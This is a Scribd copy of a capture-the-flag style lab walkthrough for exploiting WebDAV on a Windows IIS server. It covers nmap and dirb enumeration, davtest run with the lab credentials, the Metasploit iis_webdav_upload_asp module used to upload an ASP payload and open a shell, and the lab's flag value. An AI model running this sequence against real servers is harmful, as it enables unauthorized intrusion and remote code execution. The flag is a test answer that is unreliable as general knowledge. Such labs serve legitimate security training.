Scribd
Upload
73 views7 pages

Windows IIS Server Metasploit

This document provides a reference guide for exploiting a Windows IIS server using WebDav with Metasploit. It outlines essential steps including checking the target IP, running Nmap scans, using the davtest tool for authentication, and executing the Metasploit exploit module. The final step reveals a flag after accessing the C: drive on the target system.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
73 views7 pages

Windows IIS Server Metasploit

This document provides a reference guide for exploiting a Windows IIS server using WebDav with Metasploit. It outlines essential steps including checking the target IP, running Nmap scans, using the davtest tool for authentication, and executing the Metasploit exploit module. The final step reveals a flag after accessing the C: drive on the target system.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Name Windows: IIS Server: WebDav Metasploit

URL https://attackdefense.com/challengedetails?cid=2319

Type Windows Service Exploitation: IIS

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the “target” file.

Command: cat /root/Desktop/target

Step 2: Run a Nmap scan against the target IP.

Command: nmap 10.0.17.27


Step 3: We have discovered that multiple ports are open. We will be focusing on port 80 where
the IIS server is running.

Running http-enum nmap script to discover interesting directories.

Command: nmap --script http-enum -sV -p 80 10.0.17.27

We have found the webdav directory also received 401 error i.e Unauthorized.
Note: If http-enum script would take longer than expected then run dirb tool to find webdav
directory.

Command: dirb http://10.0.17.27

Step 4: Running davtest tool.

Command: davtest -url http://10.0.17.27/webdav

We can notice, /webdav path is secured with basic authentication. We have the credentials
access the /webdav path using the provided credentials i.e bob:password_123321

Command: davtest -auth bob:password_123321 -url http://10.0.17.27/webdav


We can notice that we have uploaded almost all the important file types to the /webdav
directory. Also, we can execute three types of files. i.e asp, text, and html.

Step 5: Run metasploit framework and exploit the target using the IIS webdav exploit module.

Commands:
msfconsole -q
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS 10.0.17.27
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit%RAND%.asp
exploit

Step 6: Read the flag.

Check the content of the C:\ drive.

Commands: shell
cd /
dir
type flag.txt
This reveals the flag to us.

Flag: d3aff16a801b4b7d36b4da1094bee345

References:

1. DAVTest (https://github.com/cldrn/davtest)
2. Metasploit Module
(https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp/)

You might also like